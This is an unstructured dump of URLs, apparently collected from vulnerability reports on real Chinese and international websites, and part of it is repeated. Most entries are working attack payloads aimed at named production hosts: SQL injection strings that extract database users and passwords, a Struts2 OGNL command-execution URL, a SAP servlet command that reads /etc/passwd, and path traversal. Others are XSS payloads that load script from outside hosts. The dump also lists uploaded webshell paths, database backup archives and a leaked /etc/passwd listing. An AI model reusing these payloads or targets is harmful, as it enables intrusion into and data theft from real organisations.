http://www.xinwanwang.cn/reg/Handle.asp?OrderID=host_m31305230007 http://fatezero.07073.com/Default_Search.html http://sucai.manage.meitu.com/sucai/index.php?type=1 http://www.yto.net.cn/cn/human/detail.aspx?action=jobDetails&Recruittypeid=1&stylePath=jobDetailsStyle.xsl http://video.sina.com.cn/v/b/78301751-2731820701.html http://www.baidu.com/baidu?word=%22%2F%3E%3Cscript%3Ealert(%2Fxss%2F)%3C%2Fscript%3E&tn=myie2dg&ch=6 http://ad.msn.cn/login!devhelpRedirect.action http://ad.msn.cn/KSSG.txt http://www.chekucafe.com/content_cyxm.php?NID=2 http://crm.septwolves.com:8080/?app_act=index/login http://www.hzlib.org/opac/websearch/bookSearch?cmdACT=detailmarc&xsl=listdetailmarc.xsl&bookrecno=22344 http://wooyun.org/bugs/wooyun-2010-020127,建议乌云联系厂商让那个开发这个系统的公司逐个联系用户修复漏洞,不然后果不堪设想,涉及范围很广,这里我只拿惠州慈云图书馆出来说 http://jixiechang.lxjx.cn/cnsail/inc/data.asp通过新建一个ASP后缀的数据库,插入一句话,可以获取Webshell并且服务器权限设置不当可以服务器目录。 http://biz.finance.sina.com.cn/zjztadmin/expert_login.php http://stb.mcprc.gov.cn http://stb.mcprc.gov.cn/ccnt-webapp/pages/CcntNj/list.do http://stb.mcprc.gov.cn/ccnt-webapp/pages/CcntZzpg/list.do xssing.me/api3354 http://www.baidu.com/s?tn=monline_4_dg&ie=utf-8&bs=runat%3D%22%3C%2F%3E+%3Cscript+src%3D%2F%2Fxssing.me%2Fapi3354%3E%3C%2Fscript%3E&f=8&rsv_bp=1&wd=runat%3D%22%3C%2F%3E+%3Cscript+src%3D%2F%2Fxssing.me%2Fapi3354%3E%3C%2Fscript%3E&inputT=0 http://www.qdbus.com.cn/news/guanli.asp http://event.youku.com/littlesheep/winter/admin/login.php http://www.hlschina.com/CXLXBackzh/login.aspx http://www.gzszk.com:8000/web/include/content.php?contentID=145 http://www.go.cn/index.php?m=settings http://i.maxthon.cn/)XSS跨站+拒绝服务[遨游今日PR:6 http://i.maxthon.cn/#!w="/ http://member.aili.com/?c=member&m=album&a=albumlist&uid=1031420 http://www.imaidan.com/ http://www.imaidan.com/www.imaidan.com.rar http://www.nd56.com/ http://124.172.[马赛克]/Query.asp http://icareer.huawei.com/db.rar http://nj.lsaic.gov.cn:7011/i!index.action jtshys.tongji.edu.cn/login.action www.winads.cn/ad/userAction!login.action http://bbs.webscan.360.cn/forum.php?mod=viewthread&tid=8613&extra=page%3D1 http://www.glvchina.com/chinese/course/company/feedbacks.php?id=4 http://218.94.1.166/ http://shop103844734.taobao.com http://qq3g.trip8080.com http://qq3g.trip8080.com/user/findPwdType.htm http://bbs.lbsyun.baidu.com/ http://bbs.lbsyun.baidu.com/images/default/baidu_logo.gif/.php http://bbs.lbsyun.baidu.com/attachments/month_1305/13052518193284fcae877eeb41.gif d813186c2b076e696d9955621c2b5c1c:dda447在cmd5上没解出来,于是也就没再继续深入了 http://www.hokoexp.com/loadnews.do?method=show&newstype=1%20AND%209168=DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2899%29||CHR%2887%29||CHR%2881%29||CHR%28104%29,5%29 http://www.pfc.cn/tongxuelu/admin/login.asp http://biz.finance.sina.com.cn/hk/SehkNews_one.php?id=186503 http://hd.jstv.com/xiaohua/regist.aspx# http://61.135.251.48 http://www.yz-hotels.cn/index.php/hotels http://www.yz-hotels.cn/index.php/hotels/book http://secaqb.anquanbao.org/sqlin.php?id=%281%29union/*!select/*%0A*/1,user%28%29,3,4*/from%20mysql.user http://www.nite.org.cn/web.rar http://secaqb.anquanbao.org/sqlin.php?id=%281%29%20union/*%0A*/select%20/*%0A*/1,user,password,4%20from/*%0A*/mysql.user http://eps.shmetro.com/ieps/DispatchAction.do?efFormEname=DXPS0001&serviceName=DXPS0001 site:pinyin.cn server:/usr/lib/jvm/java-6-openjdk/jre/lib/amd64:/usr/lib/jvm/java-6-openjdk/jre/../lib/amd64:/usr/java/packages/lib/amd64:/usr/lib/jni:/lib:/usr/lib http://java.sun.com/ http://gdvalue.gdca.gov.cn http://datagdca.gdca.gov.cn http://flower.guilinlife.com/flower/flower_florist_cart.php http://fc.118100.cn http://eps.baosteel.net.cn/eps_shp_mem/commodity/indexEs.jsp?custId=U33888 http://sir.uibe.edu.cn/dvbbs/UploadFile/2013-5/20135271532078359.php http://mzj.dl.gov.cn:8080/loginaction.action http://fans.wanmei.com/ http://118.145.10.14:8080/webfile/images/wangba/barinfo/xiejue1234561369721333725.jsp http://service-parts.mercedes-benz.com/dcagportal/DCAGPortal/login.action http://123.126.99.35/ http://110.249.253.166:82/gxtxm/regUser.action http://127.0.0.1/ecshop/languages/en_us/common.php http://www.qq.com&e.eeuha.com/ozign http://www.17ugo.com/user.php?act=order_detail&order_id=284470 http://127.0.0.1/ecshop/user.php http://wave.renren.com/about.aspx?type=M&class=M10&year=2006 http://beijing.kuyiso.com/channel.asp?bigcityid=1&ctype=97&zpqzflag=1&wbkeyword=%% http://zone.wooyun.org/content/3565 http://wq.tom.com/plus/feedback.php?action=send&comtype=comments&aid=1&isconfirm=yes&cmtuser=admin&msg=asfsafsdaf&face=6&validate=slep&title=1',"'",1,3,4,5,6,7,8 http://wq.tom.com/plus/feedback.php?action=send&comtype=reply&fid=引用楼层&isconfirm=yes&cmtuser=admin&msg=asfsafsdaf&face=6&validate=angr&title=1&sbbt=%E5%8F%91%E9%80%81%E8%AF%84%E8%AE%BA&validate=验证码 http://wq.tom.com/dede/login.php http://wq.tom.com/plus/feedback.php?action=send&comtype=comments&aid=1&isconfirm=yes&cmtuser=admin&msg=asfsafsdaf&face=6&validate=slep&title=1',(char(@`'`)),/*&sbbt=%E5%8F%91%E9%80%81%E8%AF%84%E8%AE%BA&validate=验证码 http://www.phpwind.net/read/2993589 http://www.xxxxxx.com.cn/edit/db/ewebeditor.mdb http://www.ocnsh.com.cn/admin/aspcheck.asp http://www.chinarishi.gov.cn/gonggaoneirong.php?id=448此处存在注入漏洞 http://www.cshtz.gov.cn/spweb/serviceOnline/baseinfo/baseinfoonline.jsp http://book.duokan.com/__duokan_appapi/packed/store/ipad_review.html?book_id=77779b94acd94d38a451bd69658f9bc3&build=2013030401 http://www.bidding.citic.com/work/work!workList_front.action javascript:alert(document.cookie) http://bj.58.com/xingqu/13977470055945x.shtml http://www.pmcitic.com/news/news!newsList_front.action?%28%27\43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27\43context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\75false%27%29%28b%29%29&%28%27\43c%27%29%28%28%27\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27\43req\75@org.apache.struts2.ServletActionContext@getRequest%28%29%27%29%28d%29%29&%28h%29%28%28%27\43webRootzpro\75@java.lang.Runtime@getRuntime%28%29.exec%28\43req.getParameter%28%22cmd%22%29%29%27%29%28d%29%29&%28i%29%28%28%27\43webRootzproreader\75new\40java.io.DataInputStream%28\43webRootzpro.getInputStream%28%29%29%27%29%28d%29%29&%28i01%29%28%28%27\43webStr\75new\40byte[1024]%27%29%28d%29%29&%28i1%29%28%28%27\43webRootzproreader.readFully%28\43webStr%29%27%29%28d%29%29&%28i111%29%28%28%27\43webStr12\75new\40java.lang.String%28\43webStr%29%27%29%28d%29%29&%28i2%29%28%28%27\43xman\75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28i2%29%28%28%27\43xman\75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28i95%29%28%28%27\43xman.getWriter%28%29.println%28\43webStr12%29%27%29%28d%29%29&%28i99%29%28%28%27\43xman.getWriter%28%29.close%28%29%27%29%28d%29%29&cmd=cmd%20/c%20ipconfig http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=Huawei.Switch.xml&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=/2network http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=Dell.Force10.Switch.xml&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=/2network http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=Netflow.v5.xml&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=../ http://member.ffpic.com/tools/FindPass.ashx http://pmscjss.mofcom.gov.cn/auc/_news/newslist_common.jsp?cata=1 http://pmscjss.mofcom.gov.cn/auc/merge/sql.sql http://secaqb.anquanbao.org/sqlin.php?id=9 http://secaqb.anquanbao.org/sqlin.php?id=9 http://zhidao.baidu.com/question/437176497.html http://secaqb.anquanbao.org/sqlin.php?id=9 http://secaqb.anquanbao.org/sqlin.php?id=9 http://secaqb.anquanbao.org/sqlin.php?id=9 http://secaqb.anquanbao.org/sqlin.php?id=-9%20or(-1)in(1) http://secaqb.anquanbao.org/sqlin.php?id=-9%20union http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%20select http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%0bselect%0b1,user(),version(),database() http://blog.anquanbao.org/61/ http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%0bselect%201,user(),version(),database() http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%0bselect-1,user(),version(),database() http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%0bselect%2b1,user(),version(),database() http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%0bselect@`1`,user(),version(),database() http://copartner.mbaobao.com/codapp/Admin/Login.aspx http://wap.mbaobao.com/index.php/order/info/orderId/订单号/type/2 www.anying.org http://control.blog.sina.com.cn/myblog/htmlsource/quotelist.php?blogid=4726dd840102e6yw'%20and%20substring http://qhsoftoa2012.gnway.net:8082 https://online.unionpay.com/huankuan/main.do https://online.unionpay.com/portal/index.do?username= user:cpinsweb shell:/home/cpinsweb/jboss-4.2.3.GA/server/default/./tmp/deploy/tmp4987379269087835336phoenix-portal-exp.war/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin ais:x:39:39:openais Framework:/:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin piranha:x:60:60::/etc/sysconfig/ha:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin luci:x:100:101::/var/lib/luci:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin ricci:x:101:102:ricci user:/var/lib/ricci:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:102:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin cp_web:x:500:500:cp_web:/home/cp_web:/bin/bash monitor:x:501:500:monitor:/home/monitor:/bin/bash mk_web01:x:502:500:mk_web01:/home/mk_web01:/bin/bash um_web:x:503:500::/home/um_web:/bin/bash zabbix:x:504:502::/home/zabbix:/bin/bash cpinsweb:x:505:500::/home/cpinsweb:/bin/bash syschk:x:506:506::/home/syschk:/bin/bash jboss-4.2.3.GA/server/default/deploy/phoenix-portal.war http://shop.tcl.com/ http://www.jsj.edu.cn/index.php/default/index/sort/1 http://www.jsj.edu.cn/index.php/default/index/sort/1%20or%201 http://www.jsj.edu.cn/index.php/default/index/sort/1%20union%20all http://secaqb.anquanbao.org/xss.php http://secaqb.anquanbao.org/xss.php?gcode= width:1px;filter:glow%20onfilterchange=alert('piaoye') http://msdn.microsoft.com/en-us/library/ms532847%28VS.85%29.aspx http://secaqb.anquanbao.org/xss.php?gcode=%3Cembed%20src=http://www.p-ye.cn/cfrs/%20%3E%3C/embed%3E http://ha.ckers.org/xss.css http://secaqb.anquanbao.org/xss.php?gcode=%3CSTYLE%3E%40im%5Cpo%5Crt'http%3A%2F%2Fha.ckers.org%2Fxss.css'%3B%3C%2FSTYLE%3E http://secaqb.anquanbao.org/xss.php?gcode=%3CDIV%20STYLE%3D%22width%3A%EF%BD%85%EF%BD%98pre%EF%BD%93sion(alert('piaoye'))%3B%22%3E ascript:alert('anyunix') http://secaqb.anquanbao.org/xss.php?gcode=%3CIMG%20SRC%3D%22jav%26%23x09%3Bascript%3Aalert('piaoye')%3B%22%3E http://ha.ckers.org/xss.css http://secaqb.anquanbao.org/xss.php?gcode=%3Clink%20rel%3D%22stylesheet%22%20HREF%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.css%22%3E javascript:alert('XSS') script:alert('piaoye') http://secaqb.anquanbao.org/xss.php?gcode=%3CTABLE%20BACKGROUND%3D%22java%26%23x0D%3Bscript%3Aalert('piaoye')%22%3E http://123.125.116.213/ http://wooyun.org/bugs/wooyun-2010-022762 http://wooyun.org/bugs/wooyun-2010-019360 http://114.112.94.111/) http://114.112.94.111/logs/) http://mgm.1kan.tv(这里说一下 http://mgm.1kan.tv http://mgm.1kan.tv http://secaqb.anquanbao.org/sqlin.php?id=-9.union%0Bselect~1,database%28%29,3,4 http://jianli.58.com/interviewinvitereceive/?list=apply&type=1&infoid=13503944312714 http://su.58.com/tech/12972441389827x.shtml http://jianli.58.com/interviewinvitereceive/?list=apply&type=1&infoid=12972441389827 http://qipai.sina.com.cn/news_content.php?id=141 http://qipai.sina.com.cn/news_content.php?id=640 http://qipai.sina.com.cn/news_content.php?id=637 javascript:alert(document.cookie) http://love.ganji.com/199909446.htm http://sd6.tbcdn.cn/dcAsyn.htm?h=p_lazyHd_sid130918286_pid185916040&v=1&sv=1&siteId=3&virtual=false&flagShip=false&int=false&ins=true&dn=&sci=2&dvh=1&dr=1&df=1&l=p_lazyLeft_sid130918286_pid185916040&r=p_lazyRight_sid130918286_pid185916040&f=p_lazyFt_sid130918286_pid185916040&t=1369289309136&css=css_sid62168109 http://kde.cnki.net/KDEService/Search/Brief/CJFD/?Author=黄志光 http://kde.cnki.net/KDEService/Search/Brief/CJFD/?Author=黄志光 http://kde.cnki.net/KDEService/Search/Brief/CJFD/?黄志光 http://kde.cnki.net/KDEService/Search/Brief/CJFD/?Author=黄志光 www.lzj【马赛克】.com http://whois.chinaz.com/www.lzj【马赛克】.com www.net.cn www.west263.com www.szhot.com www.sudu.cn www.npointhost.com www.eb.com.cn http://www.baidu.com:80@www.evil.com/之类的域名没有进行跳转提示或者显示真实域名,用户可能会被一个恶意构造的域名欺骗。 http://www.evil.com/ http://wap.uc.cn/index.php?action=BrandPicApi&brand=nokia http://wap.ucweb.com/test/ http://xss.tw/XXX http://db.duowan.com/sgcq/zb.php?key=%E6%88%98%E5%A3%AB www.sxinfo.gov.cn http://218.26.227.165/book/topic/vote/Com_content.do?label=2012news&id=8a8a899b3d803908013d80a578e10016 dword:00000002 http://sourceforge.net/projects/filezilla/ http://ip.filezilla-project.org/ip.php http://www.doov.com.cn/dwnews.html?layout=dvnewdetails&sid=1&artid=1094%20and%201=2%20union%20select%201,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 http://www.doov.com.cn/dwnews.html?layout=dvnewdetails&sid=1&artid=1094%20and%201=2%20union%20select%201,Password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20mysql.user%20where%20User%20=%20'root http://www.doov.com.cn/dadmin/Sys_login.php http://beian.021.net/ http://www.xinwanwang.cn/reg/Handle.asp?OrderID=host_m31305230007 http://fatezero.07073.com/Default_Search.html http://sucai.manage.meitu.com/sucai/index.php?type=1 http://www.yto.net.cn/cn/human/detail.aspx?action=jobDetails&Recruittypeid=1&stylePath=jobDetailsStyle.xsl http://video.sina.com.cn/v/b/78301751-2731820701.html http://www.baidu.com/baidu?word=%22%2F%3E%3Cscript%3Ealert(%2Fxss%2F)%3C%2Fscript%3E&tn=myie2dg&ch=6 http://ad.msn.cn/login!devhelpRedirect.action http://ad.msn.cn/KSSG.txt http://www.chekucafe.com/content_cyxm.php?NID=2 http://crm.septwolves.com:8080/?app_act=index/login http://www.hzlib.org/opac/websearch/bookSearch?cmdACT=detailmarc&xsl=listdetailmarc.xsl&bookrecno=22344 http://wooyun.org/bugs/wooyun-2010-020127,建议乌云联系厂商让那个开发这个系统的公司逐个联系用户修复漏洞,不然后果不堪设想,涉及范围很广,这里我只拿惠州慈云图书馆出来说 http://jixiechang.lxjx.cn/cnsail/inc/data.asp通过新建一个ASP后缀的数据库,插入一句话,可以获取Webshell并且服务器权限设置不当可以服务器目录。 http://biz.finance.sina.com.cn/zjztadmin/expert_login.php http://stb.mcprc.gov.cn http://stb.mcprc.gov.cn/ccnt-webapp/pages/CcntNj/list.do http://stb.mcprc.gov.cn/ccnt-webapp/pages/CcntZzpg/list.do xssing.me/api3354 http://www.baidu.com/s?tn=monline_4_dg&ie=utf-8&bs=runat%3D%22%3C%2F%3E+%3Cscript+src%3D%2F%2Fxssing.me%2Fapi3354%3E%3C%2Fscript%3E&f=8&rsv_bp=1&wd=runat%3D%22%3C%2F%3E+%3Cscript+src%3D%2F%2Fxssing.me%2Fapi3354%3E%3C%2Fscript%3E&inputT=0 http://www.qdbus.com.cn/news/guanli.asp http://event.youku.com/littlesheep/winter/admin/login.php http://www.hlschina.com/CXLXBackzh/login.aspx http://www.gzszk.com:8000/web/include/content.php?contentID=145 http://www.go.cn/index.php?m=settings http://i.maxthon.cn/)XSS跨站+拒绝服务[遨游今日PR:6 http://i.maxthon.cn/#!w="/ http://member.aili.com/?c=member&m=album&a=albumlist&uid=1031420 http://www.imaidan.com/ http://www.imaidan.com/www.imaidan.com.rar http://www.nd56.com/ http://124.172.[马赛克]/Query.asp http://icareer.huawei.com/db.rar http://nj.lsaic.gov.cn:7011/i!index.action jtshys.tongji.edu.cn/login.action www.winads.cn/ad/userAction!login.action http://bbs.webscan.360.cn/forum.php?mod=viewthread&tid=8613&extra=page%3D1 http://www.glvchina.com/chinese/course/company/feedbacks.php?id=4 http://218.94.1.166/ http://shop103844734.taobao.com http://qq3g.trip8080.com http://qq3g.trip8080.com/user/findPwdType.htm http://bbs.lbsyun.baidu.com/ http://bbs.lbsyun.baidu.com/images/default/baidu_logo.gif/.php http://bbs.lbsyun.baidu.com/attachments/month_1305/13052518193284fcae877eeb41.gif d813186c2b076e696d9955621c2b5c1c:dda447在cmd5上没解出来,于是也就没再继续深入了 http://www.hokoexp.com/loadnews.do?method=show&newstype=1%20AND%209168=DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2899%29||CHR%2887%29||CHR%2881%29||CHR%28104%29,5%29 http://www.pfc.cn/tongxuelu/admin/login.asp http://biz.finance.sina.com.cn/hk/SehkNews_one.php?id=186503 http://hd.jstv.com/xiaohua/regist.aspx# http://61.135.251.48 http://www.yz-hotels.cn/index.php/hotels http://www.yz-hotels.cn/index.php/hotels/book http://secaqb.anquanbao.org/sqlin.php?id=%281%29union/*!select/*%0A*/1,user%28%29,3,4*/from%20mysql.user http://www.nite.org.cn/web.rar http://secaqb.anquanbao.org/sqlin.php?id=%281%29%20union/*%0A*/select%20/*%0A*/1,user,password,4%20from/*%0A*/mysql.user http://eps.shmetro.com/ieps/DispatchAction.do?efFormEname=DXPS0001&serviceName=DXPS0001 site:pinyin.cn server:/usr/lib/jvm/java-6-openjdk/jre/lib/amd64:/usr/lib/jvm/java-6-openjdk/jre/../lib/amd64:/usr/java/packages/lib/amd64:/usr/lib/jni:/lib:/usr/lib http://java.sun.com/ http://gdvalue.gdca.gov.cn http://datagdca.gdca.gov.cn http://flower.guilinlife.com/flower/flower_florist_cart.php http://fc.118100.cn http://eps.baosteel.net.cn/eps_shp_mem/commodity/indexEs.jsp?custId=U33888 http://sir.uibe.edu.cn/dvbbs/UploadFile/2013-5/20135271532078359.php http://mzj.dl.gov.cn:8080/loginaction.action http://fans.wanmei.com/ http://118.145.10.14:8080/webfile/images/wangba/barinfo/xiejue1234561369721333725.jsp http://service-parts.mercedes-benz.com/dcagportal/DCAGPortal/login.action http://123.126.99.35/ http://110.249.253.166:82/gxtxm/regUser.action http://127.0.0.1/ecshop/languages/en_us/common.php http://www.qq.com&e.eeuha.com/ozign http://www.17ugo.com/user.php?act=order_detail&order_id=284470 http://127.0.0.1/ecshop/user.php http://wave.renren.com/about.aspx?type=M&class=M10&year=2006 http://beijing.kuyiso.com/channel.asp?bigcityid=1&ctype=97&zpqzflag=1&wbkeyword=%% http://zone.wooyun.org/content/3565 http://wq.tom.com/plus/feedback.php?action=send&comtype=comments&aid=1&isconfirm=yes&cmtuser=admin&msg=asfsafsdaf&face=6&validate=slep&title=1',"'",1,3,4,5,6,7,8 http://wq.tom.com/plus/feedback.php?action=send&comtype=reply&fid=引用楼层&isconfirm=yes&cmtuser=admin&msg=asfsafsdaf&face=6&validate=angr&title=1&sbbt=%E5%8F%91%E9%80%81%E8%AF%84%E8%AE%BA&validate=验证码 http://wq.tom.com/dede/login.php http://wq.tom.com/plus/feedback.php?action=send&comtype=comments&aid=1&isconfirm=yes&cmtuser=admin&msg=asfsafsdaf&face=6&validate=slep&title=1',(char(@`'`)),/*&sbbt=%E5%8F%91%E9%80%81%E8%AF%84%E8%AE%BA&validate=验证码 http://scrcu.21tb.com/login/login.logout.do http://localhost/ecshop/languages/zh_cn/user.php http://localhost/ecshop/languages/zh_cn/fuck.php http://bbs.cjxtv.com/存在遍历 http://bbs.cjxtv.com/Data/ http://itgroup.jcdecauxchina.com.cn:8000/Login.aspx http://app.finance.ifeng.com/finance/fundhtml/jjfh.php?comp=1&fund=0&p=5&year=2013 http://www.uxdaward.org/member/ http://localhost/manager/user.do?method=emailForCheckingAdmin width:400 width:400 http://www.hnzzgas.com/showNews!show.action?id=5a9c84bd3b6fa907013b744931bf0002 http://www.quamnet.com/index.action http://terminal.chinaef.com/system/logout.action http://www.china-sss.com/airOrder/PrintTravelList?ohId=60514911 http://www.tsinghuait.com/1.txt http://music.dangdang.com/project/music/hosts/ajax_proxy.php http://music.dangdang.com:80/ music.dangdang.com/&ques_type=-1&action=research_submit http://i.xmu.edu.cn/detach.portal?.pmn=view&action=bulletinBrowser&.ia=false&.pen=pe307&bulletinId=6ed7ae09-4917-11e2-bd5e-f59a5e283c39 site:edu.cn/login.portal http://jyxt.njmu.edu.cn/detach.portal?.pmn=view&action=bulletinBrowser&.ia=false&.pen=pe166&bulletinId=0204fb6f-acc2-11e2-b688-d7c5445b1895 http://yx.nuaa.edu.cn/detach.portal?.pmn=view&action=bulletinBrowser&.ia=false&.pen=pe1281&bulletinId=ef106386-dc48-11e1-bdbe-f3e4bab85510 http://yx.urp.seu.edu.cn/detach.portal?.pen=pe85&.pmn=view&action=bulletinBrowser&bulletinId=60d6dec1-c3eb-11e0-8757-d1822bab2551 http://tj91.tongji.edu.cn/detach.portal?.pmn=view&action=bulletinBrowser&.ia=false&.pen=pe381&bulletinId=1036c7dd-8c3f-11e2-8af4-afebc6a315bc http://student.tongji.edu.cn/detach.portal?.pen=pe521&.pmn=view&action=articleDetail&bulletinId=2b685df4-76c1-11df-ba54-c9b78d6240e6 http://zcc.tongji.edu.cn/detach.portal?.pa=aT1QNzY1MDYzJnQ9ciZzPW1heGltaXplZCZtPXZpZXc%3D&viewaction=viewdetail&fei=2566&group_id=41&pagenum=1&num=5&level=0 http://jy.nbu.edu.cn/detach.portal?.pmn=view&action=bulletinBrowser&.ia=false&.pen=pe824&bulletinId=6ad7e021-b846-11e2-8fb4-65aa1f1026a8 http://jy.gdufs.edu.cn/detach.portal?.pen=pe127&.pmn=view&action=bulletinBrowser&bulletinId=fe052ebd-c121-11e2-82f4-b16f6341ecbe http://yx.tmu.edu.cn/detach.portal?.pen=bulletinBrowser&.pmn=view&action=bulletinBrowser&bulletinId=46e38c49-db80-11e1-934e-53cf096a819c http://portal.uestc.edu.cn/detach.portal?action=bulletinBrowser&.ia=false&.pmn=view&.pen=pe2421&bulletinId=ebc9dbfb-e48d-11de-a17b-ebe083a9498a%20and%201=1 http://regi.ustc.edu.cn/detach.portal?.pen=pe38&.pmn=view&action=bulletinBrowser&bulletinId=698chttp://welcome.htu.edu.cn/detach.portal?.pen=bulletinBrowser&.pmn=view&action=bulletinBrowser&bulletinId=01739eec-b11c-11e0-a9c9-035c06e14b9b'5e93-9507-11de-b121-9b861b679231 http://movie.dangdang.com/project/movie/hosts/ajax_proxy.php http://movie.dangdang.com:80/ movie.dangdang.com/&ques_type=-1&action=research_submit http://365jia.cn/uploads/13/0529/51a62071dfd17.php http://www.4008123456.com/tclcc/portlets/examine/begin.do?form_id=1 http://www.zhenguoli.com使用的是phpcmsv9整站,服务器环境apache,导致可以getshell http://125.93.53.88/jmx-console/ http://125.93.53.88/jmx-console/ http://125.93.53.81:8081/jmx-console/ http://kfcrm.inc.hc360.com/member_manage/member_service_list.aspx?member_id=zjcsmj88 http://www.100tong.com.cn//plus/search.php?keyword=as&typeArr[111%3D@`\ http://gvshs5cs.haier.com/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20/etc/passwd http://www.dangdang.com/default_json_file_2012.php?area_num=/../..//../..//../..//../..//../..//etc/passwd%00&area_name=L3&screensize=1920&t=0.002583379581056311 http://www.dangdang.com:80/ www.dangdang.com http://mmme.me/xss.js http://trade.jd.com/consignee/saveConsignee.action http://mmme.me/xss.js http://trade.jd.com/payAndShip/savePayAndShip.action http://gate.jd.com/InitCart.aspx?pcount=100000000&ptype=1&pid= http://www.pcbpartner.cn/ http://www.cce.fudan.edu.cn/admin/Login.asp www.ecshop.cn http://dev.wanda.cn/demo/ http://ctcc.com.cn/admin/admin/index.aspx http://ctcc.com.cn/images/list.asp http://www.4008040080.com/index.php/Content/Index/show/catid/%24%7B%40print%28md5%28admin%29%29%7D/id/__THEME__ www.vipidc.com http://2011.vipidc.com/loadIndex.action mailto:aa@aa.com,此时选择由chrome打开 http://211.139.140.14/TMS/dorado/access.login.d http://www.gm.cdut.edu.cn/Query/Scscjcx/ http://cloud.sccl.cn:8499/admin/getAllSysDeptsWithDomainIsNotNull.action http://cmsdt.xdf.cn/getabroad.php?typeid=4422 http://cmsdt.xdf.cn/getclassinfo.php?typeid=4423 http://app.test.xdf.cn/getabroad.php?typeid=4504 http://region1.cei.gov.cn/ http://region1.cei.gov.cn/panel/admin/add_user.aspx http://localhost/panel/ckfinder/ckfinder.html) http://chuangshi.qq.com/read/Novel/forum/cid/3408 http://chuangshi.qq.com/read/novel/forum/cid/3408.html http://58.83.206.86/ http://58.83.206.148/ http://58.223.251.6:8080/cwmp/index.jsp http://58.223.251.6:8080/vip/index.jsp http://58.223.251.6:8080/emportal/index.jsp http://58.223.251.6:8080/wap/ http://58.223.251.6:8080/opportal/index.jsp http://58.223.251.6:8080/opportal/index.jsp http://58.223.251.6:8080/download/files/3.05.01.zip http://www.njkdw.com/abc/672.html http://cms.sohu.com/index/view.action http://www.sctvgo.com http://www.sctvgo.com/productlist.aspx?cid=12&l=2 http://aobo.tcl.com http://aobo.tcl.com/leftabout.asp?id=2 http://aobo.tcl.com/leftdy.asp?id=27 http://t.stat.youku.com/resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml http://t.stat.youku.com/resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp http://anerle.youku.com/admin/left.php http://ninjiom.youku.com/ http://passport.soku.com/user/logout?__callback=%3Cscript%3Ealert%28/xss/%29%3C/script%3E http://softcoreonline.huawei.com/front/faq!list.action 